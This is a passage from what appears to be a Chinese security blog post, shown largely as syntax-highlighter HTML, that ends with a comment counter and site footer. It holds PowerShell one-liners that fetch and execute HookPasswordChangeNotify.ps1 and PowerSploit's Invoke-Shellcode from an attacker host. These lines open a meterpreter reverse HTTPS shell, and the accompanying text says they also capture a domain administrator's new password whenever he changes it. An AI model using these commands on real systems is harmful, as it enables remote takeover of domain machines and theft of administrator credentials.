224) !important;">-</span><span class="crayon-t" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(128, 0, 128) !important;">Object</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">System</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Net</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">WebClient</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-e" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">DownloadString</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">"http://10.101.101.16/HookPasswordChangeNotify.ps1"</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f831852981309-2" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line" id="crayon-5c25a60d4f831852981309-3" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">IEX</span>&nbsp;<span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-r" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">New</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-t" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(128, 0, 128) !important;">Object</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">System</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Net</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">WebClient</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-e" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">DownloadString</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">"http://10.101.101.16/powersploit/CodeExecution/Invoke-Shellcode.ps1"</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Invoke</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">Shellcode</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">payload</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">windows</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">/</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">meterpreter</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">/</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">reverse</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">_</span>https&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">lhost</span>&nbsp;<span class="crayon-cn" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 153, 153) !important;">10.101.101.16</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">lport</span>&nbsp;<span class="crayon-cn" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 153, 153) !important;">7777</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">force</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">这样一方面我们可以反弹一个&nbsp;meterpreter&nbsp;，另一方面还可以在域管理员改密码的时候记录他的新密码：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7hmoeffsj216f0nm43q.jpg" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p></p><br/><p></p><p><br/></p>

打赏我,让我更有动力~

0 条回复   |  直到 2019-4-1 | 1305 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2025 掌控者 All Rights Reserved.